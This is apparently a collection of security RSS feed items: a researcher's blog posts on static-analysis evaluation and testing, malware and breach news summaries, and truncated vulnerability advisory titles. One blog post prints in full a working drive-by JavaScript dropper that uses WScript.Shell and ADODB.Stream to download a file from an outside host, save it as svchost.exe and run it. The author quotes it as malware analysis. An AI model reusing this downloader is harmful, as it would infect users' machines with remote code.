http://rgaucher.info/feed/rss2 It has been some time since I haven't post on my blog... well, I've been busy especially with the end of SATE, and oh well! had vacation :) Anyway, at the next Static Analysis Workshop this Thursday, we're gonna talk about the SATE experiment and the observations/results we could get from this. I am then gonna talk about a tool I wrote in order to probe if a reported weakness is a false-positive: this is the Automated Evaluation. The main idea of the Automated Evaluation, is to get some information on the source code and, under some assumptions, try to make a conclusion on the correctness of the piece of code. Behind all the reasoning from that particular tool, my approach had to be radically different than a classical SCA otherwise this would have been like creating a new SCA and this would have been obviously useless. The context of this automated evaluation is limited to the buffer overflows and this can only work for proving false-positive only! So basically, I am reading the source code from the reported sink to the possibles sources and grabbing the actions that possibly affect the variable which have a role in the code. These actions are like: * Allocation of a destination buffer * Computing the size of the source buffer(s) * Test for NULL * Test that involves the size of the buffers... * ... and some others Then, once these actions are detected, the tool increments a global score of false-positiveness to this reported weakness. We then only have to set a threshold in order to know what correctness we want to have; this is really tied to the source code and how the program is developed. Even though this evaluation method is not perfect, this was adapted to the C test cases we had in SATE 2008 since the global code quality was good. We can even say that the software were well written; it was then okay to make some assumption on the code such as: * If the size of the destination buffer is computed with the size of the source buffer, the size is good (basically: no off-by-one) Also, the tool itself needs some information on the source code such since it uses regular expression to match the "actions"... Here we are for a quick explanation and here are the slides: SAW: Automated Evaluation of SCA output

==> ph34r the script kiddies: Whitehouse.org

http://rgaucher.info/feed/rss2 I was just reading this news (reported by Kanedaa), decided to look closer to the content of this "malware" stuff to see if there was some nice techniques behind this so called "attack". Oh men! How disappointing to see that this was done by script kiddies... the "obfuscation" consist of 3 levels of URL encoded javascript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was just not obfuscated either... Just this: function myCreateOB(o, n) { var r = null; try { eval('r = o.CreateObject(n)') }catch(e){} if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} } if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}} if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}} if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}} if (! r) {try { eval('r = o.GetObject(n)') }catch(e){} } return(r); } function Go(a) { var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll"); var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am"); var e = s.Environment("Process"); var xml = null; var url = 'http://ad.ox88.info/bbs.jpg'; var bin = e.Item("TEMP") + "svchost.exe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); } catch(e) { xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP"); } } if (! xml) return(0); xml.open("GET", url, false) xml.send(null); dat = xml.responseBody; o.Type = 1; o.Mode = 3; o.Open(); o.Write(dat); o.SaveToFile(bin, 2); s.Run(bin,0); } function mywoewd() { var i = 0; var ss11='{7F5B7F'; var ss12='63-F06'; var ss13='F-4331-8A'; var ss14='26-339E0' var ss15='3C0AE3D}'; var ss1=ss11+ss12+ss13+ss14+ss15 var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}"; var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}"; var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}"; var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}"; var t = new Array(ss1,ss2,ss3,ss4,ss5,null); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell"); if (b) { Go(a); return(0); } } catch(e){} } i++; } } As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)

==> Yet another study on code quality: A Tale of Four Kernels

http://rgaucher.info/feed/rss2 If like me you are interested in code quality and some general conclusion that one can draw based on code quality studies, I really recommend to read this paper: A Tale of Four Kernels by Diomidis Spinellis, ICSE '08: Proceedings of the 30th International Conference on Software Engineering I just want to quote a part of the conclusion by the author Therefore, the most we can read from the overall balance of marks is that open source development approaches do not produce software of markedly higher quality than proprietary software development. The only problem with this statement is that it is based on the fact that the metrics he used were not weighted for their importance for the "Code Quality" (if this means something). Therefore, the comparison between the Windows research kernel and Linux seems a little bit awkward to me. Anyway, this is a very interesting paper about code quality, and lots of interesting ideas from the author of CScout.

==> Static Analysis Tool Exposition is over

http://rgaucher.info/feed/rss2 Yeah, that's sad and also a relief: SATE is over. We actually released today the last stage of the evaluation (basically, the evaluation with some correction based on comments from the participants). Even though I would have prefer to have more feedback from participants on our evaluation, especially to increase its quality, I still think SATE is a good thing and will be an interesting resource for lost of researchers. This is, as far as I know, the only exhaustive resource on the subject (wild source code + weaknesses). What do I want to do, see next? Since we have accumulated lots of data with the tool reports (raw weaknesses), the evaluations (I really want to thank MITRE's guys, especially Steve Christey and Bob Schmeichel for their help), I'm looking forward to do data analysis and trying to extract some limited results on it. Anyway, this was overall a good experience, I actually did my first real code review mostly on lighttpd, dspace, mvnform and naim, I think I know way more on how detecting vulnerabilities, I also have been asking myself about how to rate vulnerabilities such as Cross-Site Scripting (hopefully, I will release the little document I wrote about it), I learned so much about how people are writing code trying to understand the design, the code etc. in the applications. Also, hopefully, I will be able to release the website I developed to handle the weaknesses from different tools. It is, I think, interesting if you are working with more than one assessor. You can send evaluation, comments, merging the weaknesses etc. with a web interface. Even though it needs improvements (it has been done in less than 2 weeks) I think this would be an interesting piece of software for people who are dealing with tons of weaknesses. Another interesting point is that we (at NIST) may open that website for everybody in order to make new evaluation in order to increase the quality of the data we currently have. Oh well, it seems like a journey is really close to its end, it was such a good time sometimes, and some other time such consuming work. We've been dealing with fifty thousands of weaknesses, dozen of tool reports, and almost tens of test cases... I will keep you posted about the next decision we are gonna make with SATE and hope that lots of people will find in this "exposition" the most they could get.

==> Oh please stop it with these ridiculous CAPTCHAs!

http://rgaucher.info/feed/rss2 Marcin just told me about that stupid CAPTCHA from the rapidshare website. Even if I think this is made explicitly to annoy people (this CAPTCHA is used only for free accounts) this is just stupid. Can you really tell which letter has cat or not? I'm sorry but I can't!

==> Accelerate the convergence to the bug: Running the test in 16-bit

http://rgaucher.info/feed/rss2 Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only the code is well written (which is always worse for finding bugs :)) but the structure is also well thought (this is the implementation of an associated array in C in the lighttpd application). The problem I had was to state whether a tool report was a true-positive/false-positive. So, as in many case I've seen in this software a problem may occur only in the limit cases. This one may occur after INT_MAX insertion in the structure. I don't know if one of you ever tried to do such a thing, but only INT_MAX (~2 billions on typical PC) allocations is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition). I then ran a simple test program to fill this structure in a real condition: a typical x86/32-bit architecture. As I knew it was stupid and didn't even think this could end before 2 days I started looking in other direction in order to reduce the INT_MAX size for having a reasonable time execution of the test. My first attempt is to shift all the types that are used, I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers, a char * would still b 32-bit (there may be some options in gcc to control the size of the pointers which I doubt but I didn't find any). Using this methodology, I was able to make the program crash in the way that would have been a real true-positive. But as I knew it was not good since the size of the pointers are not modified and I had the feeling that in that particular structure, the case of the possible crash is handled by itself (due to pointer and type limits), I started looking in other direction for running that program in 16-bit, a pseudo-real-16-bit-mode. I then started looking into emulators and how to compile code for 16-bits and running it on my linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with ELKS utilities, the test program didn't crash, it only failed in an assertion test after an allocation... Different behavior, with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test running differently than the real program on a 32-bit or maybe a limitation of the elksemu machine? As this morning I checked the state of the 32-bit run I launched yesterday, and this was finished... ended by a failed assertion. As expected, pointer size matters when you wanna test on intrinsic limitations of a structure and its behavior using limit cases.

==> Scaling MySQL db

http://rgaucher.info/feed/rss2 I've just came across this interesting blog entry; some numbers on how people (large websites companies) are actually using MySQL. http://venublog.com/2008/04/16/notes-from-scaling-mysql-up-or-out/

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Tinba banking Trojan sniffs network traffic, steals data

http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victims bank account. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions. Add to digg Add to StumbleUpon Add to del.icio.us Add to Google

==> Key Cloud Privacy Concerns in 2012

http://rss.windowsecurity.com/ This article covers major concerns that companies have when data is stored and processed in the cloud, and things that can be done to better protect against the threat vector.

==> Claims Based Identity: What does it Mean to You? (Part 1)

http://rss.windowsecurity.com/ This article series explores the identity management dilemma by addressing some of the more specific implementation of identity technologies.

==> Video: SCM 2.5 Creating GPOs from Baselines

http://rss.windowsecurity.com/ This video demonstrates the process of conversion of SCM baselines into GPOs.

==> Windows 8 Tablets: Secure enough for the Enterprise?

http://rss.windowsecurity.com/ In this article, we'll look at both the obstacles and the reasons Windows 8 tablets just might be able to overcome barriers and take the enterprise by storm.

==> The Secure Boot Controversy: What does it mean to IT?

http://rss.windowsecurity.com/ In this article we'll talk about what the implications of the Secure Boot feature in Windows 8 are - both good and bad - for businesses

==> Fighting Hackers: Everything You’ve Been Told About Passwords Is Wrong

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://www.wired.com/opinion/2012/10/passwords-and-hackers-security-and-practicality/ By Markus Jakobsson Opinion Wired.com 10.18.12 Security is not just about strong encryption, good anti-virus software, or techniques like two-factor authentication. Its also about the fuzzy things ... involving people. Thats where the security game is often won or lost. Just ask Mat Honan. We -- the users -- are supposed to be responsible, and...

==> House of Commons worker charged with hacking Quebec government website

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://www.canada.com/news/national/House+Commons+worker+charged+with+hacking+Quebec+government/7410388/story.html By Jordan Press Postmedia News October 18, 2012 OTTAWA -- A 28-year-old man faces computer crime charges for allegedly hacking the Quebec governments website in April while he was on contract for both the RCMP and the House of Commons. According to the RCMP, the hack originated from the House of Commons network when someone...

==> The White House Denies Ordering a Secret Report Clearing Huawei of Espionage

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://www.theatlanticwire.com/technology/2012/10/white-house-denies-ordering-secret-report-clearing-huawei-espionage/58091/ By Alexander Abad-Santos The Atlantic Wire Oct 18, 2012 Cue the conspiracy theories: an 18-month, Reuters says it got its hands on "a White House-ordered review of security risks posed by suppliers to U.S. telecommunications companies" that cleared Chinese telecom giant Huawei of allegations of actively...

==> Businesses face increasing challenge of targeted cyber attack: survey

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://security.cbronline.com/news/businesses-face-increasing-challenge-of-targeted-cyber-attack-survey-191012 By CBR Staff Writer 19 October 2012 Only 27% have heard about Stuxnet and 13% about Duqu About 52% of IT specialists believe that enterprise networks will be increasingly targeted by hack attacks, posing serious challenge to IT administrators, according to a survey conducted by B2B International in July 2012. One third of those...

==> Who is tweeting from the NSA's parking lot?

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.computerworld.com/s/article/9232476/Who_is_tweeting_from_the_NSA_39_s_parking_lot_ By Jeremy Kirk IDG News Service October 17, 2012 From Google Maps, the U.S. National Security Agency's parking lot has a larger footprint than the building itself. And for the high secrecy surrounding what goes on inside, there is plenty of information flowing just outside. In a demonstration on Wednesday at the Breakpoint security...

==> Tale of the encrypted

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.theage.com.au/entertainment/books/tale-of-the-encrypted-20121012-27hsy.html By Peter Pierce The Age October 13, 2012 MIDNIGHT EMPIRE By Andrew Croome Allen & Unwin, $27.99 YET another Vogel award winner for the best unpublished first novel has kicked on: after Document Z (2009), his fictionalised account of the Petrov affair of 1951, Andrew Croome has followed up with a taut, exciting and complex thriller, Midnight Empire....

==> Paper: NATO eyes Russia as potential cyber-aggressor

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.panarmenian.net/eng/news/128119/ PanARMENIAN.Net October 18, 2012 NATO considers Russia one of the key potential cyber-aggressors for the North Atlantic alliance, the Kommersant business daily reported, citing its sources in NATO's headquarters. NATO plans to hold its Cyber Coalition 2012 war game on November 13-16. In line with the exercises scenario, NATO members Hungary and Estonia come under large-scale cyber attacks...

==> Computer Viruses Are "Rampant" on Medical Devices in Hospitals

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.technologyreview.com/news/429616/computer-viruses-are-rampant-on-medical-devices/ By David Talbot Technology Review October 17, 2012 Computerized hospital equipment is increasingly vulnerable to malware infections, according to participants in a recent government panel. These infections can clog patient-monitoring equipment and other software systems, at times rendering the devices temporarily inoperable. While no injuries have...

==> Pacemaker hack can deliver deadly 830-volt jolt

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.cio.com.au/article/439322/pacemaker_hack_can_deliver_deadly_830-volt_jolt/ By Jeremy Kirk IDG News Service 17 October, 2012 Pacemakers from several manufacturers can be commanded to deliver a deadly, 830-volt shock from someone on a laptop up to 50 feet away, the result of poor software programming by medical device companies. The new research comes from Barnaby Jack of security vendor IOActive, known for his analysis of other...

==> 3 Must-Fix Vulnerabilities Top Oracle CPU Patches

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.darkreading.com/vulnerability-management/167901026/security/news/240009195/3-must-fix-vulnerabilities-top-oracle-cpu-patches.html By Ericka Chickowski Contributing Writer Dark Reading Oct 17, 2012 Systems administrators on all IT fronts will have their hands busy patching Oracle vulnerabilities across the software giant's portfolio with the release this week of the company's quarterly Critical Patch Update. Security...

==> Bank Hacks: Iran Blame Game Intensifies

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.informationweek.com/security/attacks/bank-hacks-iran-blame-game-intensifies/240009068 By Mathew J. Schwartz InformationWeek October 15, 2012 Who's behind the continuing series of attacks against the websites of numerous U.S. banks? A flurry of news reports Friday pointed the finger squarely at Iran. "They have been going after everyone--financial services, Wall Street," a senior defense official, speaking...

==> Hacking may cost Naperville more than $600,000

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.dailyherald.com/article/20121016/news/710169607/ By Justin Kmitch Daily Herald 10/17/2012 Hackers who recently compromised the security of Napervilles website, email and other online services not only put the city into an informational black hole but also a financial black hole. City council members on Tuesday approved spending as much as $673,000 to acquire network security hardware and software, computer servers, and...

==> Gartner spells out magic behind quadrants

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.theregister.co.uk/2012/10/16/gartner_magic_quadrant_research_methodology_revealed/ By Simon Sharwood, APAC Editor The Register 16th October 2012 Analyst group Gartner has detailed how it prepares its sometimes-controversial magic quadrants, revealing that a two-hour demo is sometimes part of the research process. Gartner already offers a detailed explanation of how it compiles its Magic Quadrants here. But in an exchange with...

==> BayThreat - December 7th - 8th 2012 - Call For Papers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 15 http://www.baythreat.org/cfp.html Call For Abstracts The Call for Papers for the 3rd BayThreat security conference is open! BayThreat is a 2 day event in Sunnyvale, CA, December 7th and 8th. The theme for BayThreat is a new spin on the dichotomy of attacking and defending in information security. We're calling out all of the attackers and defenders that are on the front lines of the battle. We'll analyse the latest attack...

==> Developers ignore their security responsibilities: Oracle

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 15 http://www.zdnet.com/developers-ignore-their-security-responsibilities-oracle-7000005808/ By Michael Lee ZDNet News October 16, 2012 Software developers are ignoring their responsibilities to protect and design infrastructure that is properly secured, according to Oracle Chief Security Officer Mary Ann Davidson. Speaking at the Australian Information Security Association's National Conference 2012 in Sydney today, Davidson said that...

==> None: Please update your RSS readers and bookmarks, the Security Labs blog has moved!

http://securitylabs.websense.com/content/alertsRSS.xml Please update your RSS readers and bookmarks, we've moved to a new home!
In addition to the new look-and-feel we have a few new things in place. - We have merged the blog and alerts. If you subscribe to our Alerts you will still get emails when we see something that warrants an alert - Added Categories to posts. This will make it much easier to find stories around the same topic - Added Fliptop integration which makes it really easy to subscribe to this blog in different ways We will add the ability to post Comments to the blog as well in the near future. We hope you'll like it. Remember to update your RSS feeder address by clicking on "Subscribe" in the top-right corner as the old RSS feed will not be updated. Do stop by to say hi to us at http://community.websense.com/blogs/securitylabs/

==> Malicious Web Site / Malicious Code: Fake Apple App Store Malicious Spam

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered that Apple's App Store has become the latest target for email attacks and spam. App Store is the service provided by Apple Inc. as a platform to purchase and download applications for iPhone, iPod touch, and iPad. The attack comes in the form of a fake invoice email. With Apple's App Store being one of the most popular shopping platforms for multimedia, this kind of App Store invoice email is familiar to users and tends to be received frequently. As demonstrated here, cyber-criminals clearly jump at a chance to spread their spam using any available means. The content in this campaign resides on compromised Web sites and serves a combination of pharmaceutical spam along with exploits that are delivered in the background. Some of the messages serve only pharmaceutical spam and some combine spam with exploits. In the example below, clicking the link in the message redirects the user to a site with a single link labeled "visit". In the background, a known exploit pack called "Eleonore" is delivered to the user's machine. If the user clicks on the link, they are redirected to a "Canadian Pharmacy" Web site. In this particular attack instance the file dropped by the exploit pack has 29% detection rate. Screen shot of the email: Exploits are delivered on this page in the background: Pharmaceutical spam Web site: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Skype Toolbar for Outlook Scam

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered a new wave of email attacks targeting the Skype Email Toolbar. Up to now, the amount of spam is not large, but we believe it will increase. The spam email message contains a file attachment named SkypeToolbarForOutlook.zip, which could easily deceive users but is in fact a backdoor trojan that has a very low AV detection. The spam email copies the look and feel of the legitimate application from Skype. Screen shot of the email: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Searching for Corey Haim Leads to Rogue AV

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered that search terms related to Corey Haim have become the latest target for Blackhat SEO poisoning attacks. Corey Haim, 1980s teen idol actor and a star of such famous movies as "The Lost Boys" and "License to Drive", was found dead in his Los Angeles apartment at the age of only 38 on Wednesday. Whether it's a natural disaster or a death, Blackhats monitor and adapt to popular search trends. Not long after the sad news emerged, the search phrase "Corey Haim" became one of the hottest topics in Google trends. Screenshot of the Google trend: Cybercriminals again jump at a chance to spread their rogue AVs. When users enter keywords such as "Corey Haim death" in Google, some of the results will lead them to download fake security software. The downloading FakeAV file has only 17% coverage from antivirus products. Google searching results of "Corey Haim death" that lead to rogue AVs: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: BBS of Sougou Compromised

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered that the BBS of Sougou has been compromised. The Sougou BBS home page and other pages on the site have been injected with a malicious script. The script creates an IFrame that redirects users to an exploit site: a 5-day old domain at [snip]ow.info. The latter performs some checks before delivering the exploits, in order to subvert any analysis attempts. At the time of writing this alert, the BBS of Sougou is still injected with the malicious script, but the exploit site is down. This could change at any moment. This is the injected code in the home page and its contents: Here is the exploit page: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Blackhat SEO turns to PDF with Chile and Hawaii disasters

http://securitylabs.websense.com/content/alertsRSS.xml Over 13% of all searches on Google looking for popular and trending topics will lead to malicious links and searching for the latest news on the earthquake in Chile and the tsunami hitting Hawaii are no exception. Both are now used to lure people into downloading fake antivirus products. Usually the links in the search results look like ordinary links pointing to regular web pages. This time the bad guys have changed tactics to make their search results look even more convincing, by tricking Google into thinking it's a PDF file. As you can see above Google tells you the file format is PDF and not HTML. That's not true, it is infact a regular HTML page that when visited will redirect the user to a page that looks like this - just another rogue AV fake scanning page. This one, just like the majority or rogue AV sites we have seen this week, is in the .IN TLD which is the top-level domain for India. By making the search result look like a PDF it gives the link more authenticity. Perhaps it's a research paper or at least a more well written article. The likelihood that a user will click on these type of links is probably higher than if it were just another random web link. This is the first time we've seen the attackers use this approach but considering how aggressive the rogue AV gangs are, it's not a surprise that they continue to refine their techniques to get people to "buy" their products. The Rogue AV file itself is currently detected by 26.20% of the antivirus engines used by VirusTotal. Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Searching For Joannie Rochette Leads To Rogue AV

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has detected that the black hat Search Engine Optimization (SEO) techniques are abusing the name of an Olympic figure skater who is very popular in recent news. Joannie Rochette is a Canadian figure skater and the 2009 world silver medallist. In the 2010 Winter Olympics in Vancouver, despite the loss of her mother just 48 hours before her competition, she delivered a sensational performance and qualified to compete for gold. The bad guys still took advantage of this tragic incident and used it in the infamous Black SEO poisoning attacks. Searching for Joannie Rochette in reputable search engines leads to rogue AV. This use of the Black SEO technique is even more pertinent now that the results have been announced, with Rochette receiving a bronze medal for her performance. Once the victim clicks on the poisoned search results, he/she is redirected to the rogue AV page, and a fake Anti-virus executable asks for the victim's confirmation before being downloaded. Related topics are 4th and 7th on Google's Hot Trends USA list. Joannie Rochette is currently the most popular search term on Google Canada at the time of writing: This isn't the first time Black SEO attacks target events and figures related to the olympics this year. Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Bloom Box Black SEO

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has detected that search terms related to the Bloom Energy and its Bloombox Fuel Cell have become the latest target for Blackhat SEO poisoning attacks. Bloom Box is a breakthrough technology in the energy sector that could revolutionize the way electricity is generated today. As people become interested in finding more information on this technology, related search terms are currently gaining momentum, and as they do so Blackhat SEO attacks are starting to climb up the search result listings. At the moment, according to the VirusTotal report only 10% of antivirus products are detecting the threat. Video of the Bloom Box SEO in action: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Internet Explorer 9 XSS Filter Bypass

http://securityreason.com/rss/SecurityAlert Topic: Internet Explorer 9 XSS Filter Bypass Risk: Low Text: # Internet Explorer 9 XSS Filter Bypass # Discovered by: Jean Pascal Pereira

==> F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection

http://securityreason.com/rss/SecurityAlert Topic: F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection Risk: Low Text:1. OVERVIEW F5 FirePass SSL VPN is vulnerable to Open URL Redirection. 2. BACKGROUND F5 FirePass SSL VPN provides se...

==> Henok CMS SQL Injection & Easy Login Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Henok CMS SQL Injection & Easy Login Vulnerability Risk: Medium Text:-=- In The Name Of God -=- -- @ Henok CMS SQL Injection & Easy Login Vulnerability ...

==> gonginteractive Web Design SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: gonginteractive Web Design SQL Injection Vulnerability Risk: Medium Text: ## gonginteractive Web Design Sql Injection Vulnerability ## + # Expl...

==> DotProject 2.1.5 XSS and SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: DotProject 2.1.5 XSS and SQL Injection Risk: Low Text:Information -- Name : XSS and SQL Injection Vulnerabilities in DotProject Software : DotProject 2.1.5 and possibly b...

==> ClipBucket 2.6 XSS Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: ClipBucket 2.6 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in ClipBucket Software : ClipBucket 2.6 and possibly below. Vendor Homepa...

==> CMSMini 0.2.2 XSS Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: CMSMini 0.2.2 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in CMSMini Software : CMSMini 0.2.2 and possibly below. Vendor Homepage :...

==> TaskFreak 0.6.4 XSS Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: TaskFreak 0.6.4 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in TaskFreak Software : TaskFreak 0.6.4 and possibly below. Vendor Homepa...

==> WordPress Wordfence Security XSS and IAA vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: WordPress Wordfence Security XSS and IAA vulnerabilities Risk: Low Text:I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for Word...

==> CA ARCserve Backup Security Notice

http://securityreason.com/rss/SecurityAlert Topic: CA ARCserve Backup Security Notice Risk: Medium Text:CA20121018-01: Security Notice for CA ARCserve Backup Issued: October 18, 2012 CA Technologies support is alerting custom...

==> Campaign Enterprise 11 SQL Injection & Unauthorized Access

http://securityreason.com/rss/SecurityAlert Topic: Campaign Enterprise 11 SQL Injection & Unauthorized Access Risk: Medium Text:Overview Campaign Enterprise 11, by ArialSoftware (www.arialsoftware.com), "is a mass email system you install on your...

==> ManageEngine Security Manager Plus <=5.5 Code Execution

http://securityreason.com/rss/SecurityAlert Topic: ManageEngine Security Manager Plus <=5.5 Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> ManageEngine Security Manager Plus 5.5 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: ManageEngine Security Manager Plus 5.5 SQL Injection Risk: Medium Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> ManageEngine Security Manager Plus 5.5 Traversal

http://securityreason.com/rss/SecurityAlert Topic: ManageEngine Security Manager Plus 5.5 Traversal Risk: High Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> Joomla Tag SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Joomla Tag SQL Injection Risk: Medium Text: Exploit Title: Joomla tag Remote Sql Exploit dork: inurl:index.php?option=com_tag Date: [18-10-2012] Author: Dan...

==> Joomla Freestyle Support 1.9 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Joomla Freestyle Support 1.9 SQL Injection Risk: Medium Text: Exploit Title: Joomla Freestyle Support com_fss sqli Dork: N/A Date: [17-10-2012] Author: Daniel Barragan "D4NB4...

==> Joomla Commedia 3.1 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Joomla Commedia 3.1 SQL Injection Risk: Medium Text: Exploit Title: Joomla commedia Remote Exploit dork: inurl:index.php?option=com_commedia Date: [18-10-2012] Autho...

==> CMSQLITE 1.3.2 Multiple Web Vulnerabiltiies

http://securityreason.com/rss/SecurityAlert Topic: CMSQLITE 1.3.2 Multiple Web Vulnerabiltiies Risk: Medium Text:Title: CMSQLITE v1.3.2 - Multiple Web Vulnerabiltiies Date: == 2012-10-18 References: == http://www.vuln...

==> Oracle Database Authentication Protocol Security Bypass

http://securityreason.com/rss/SecurityAlert Topic: Oracle Database Authentication Protocol Security Bypass Risk: Medium Text:Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker ca...

==> OTRS 3.1 Stored XSS Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: OTRS 3.1 Stored XSS Vulnerability Risk: Low Text:#!/usr/bin/python ''' Author: Mike Eduard - Znuny - Enterprise Services for OTRS Product: OTRS Open Technology Real Se...

==> RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution

http://securityreason.com/rss/SecurityAlert Topic: RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Risk: High Text:Title : RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Version : 15.0.6.14 Date : 2012-10-18 Vendor : ...

==> Palo Alto Networks GlobalProtect Man-In-The-Middle

http://securityreason.com/rss/SecurityAlert Topic: Palo Alto Networks GlobalProtect Man-In-The-Middle Risk: Low Text: SySS-Advisory: MitM-vulnerability in Palo Alto Networks GlobalProtect Prob...

==> Unirgy uStoreLocator Magento Extension SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Unirgy uStoreLocator Magento Extension SQL Injection Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-1 > == title: SQL Injection ...

==> ModSecurity 2.6.8 multipart/invalid part ruleset bypass

